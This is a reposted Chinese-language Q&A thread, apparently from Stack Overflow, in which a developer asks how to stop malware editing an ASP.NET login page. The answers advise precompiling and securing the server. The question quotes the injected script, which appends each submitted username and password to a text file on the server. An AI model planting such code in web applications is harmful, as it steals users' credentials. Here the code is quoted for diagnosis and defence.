[英]How to not allow editing of the web page aspx?
昨天,我的Web应用程序已被编辑登录页面的病毒更改。 当我打开aspx文件时,遇到了以下脚本:
<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
{
file.WriteLine(username.Text + "|" + password.Text);
}
}
</script>
有谁知道如何不允许这样做?
最佳实践是在生产环境中的文件后预编译视图和代码。
http://msdn.microsoft.com/zh-CN/library/vstudio/bb398860(v=vs.100).aspx
任何可以修改aspx
页面的人都可以替换bin
文件夹中的程序集。 正确的做法是保护Web服务器。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.